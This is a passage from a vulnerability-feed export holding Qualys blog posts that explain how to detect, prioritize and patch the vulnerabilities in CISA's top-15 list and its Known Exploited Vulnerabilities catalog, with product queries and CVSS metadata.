of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Vulnerabilities_tab-1.png)View vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Dashboard-1.png)Qualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Tab.png)Prioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Patch-with-Patch-Job.png)Using Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch_Management_Patches_tab.png)Viewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud 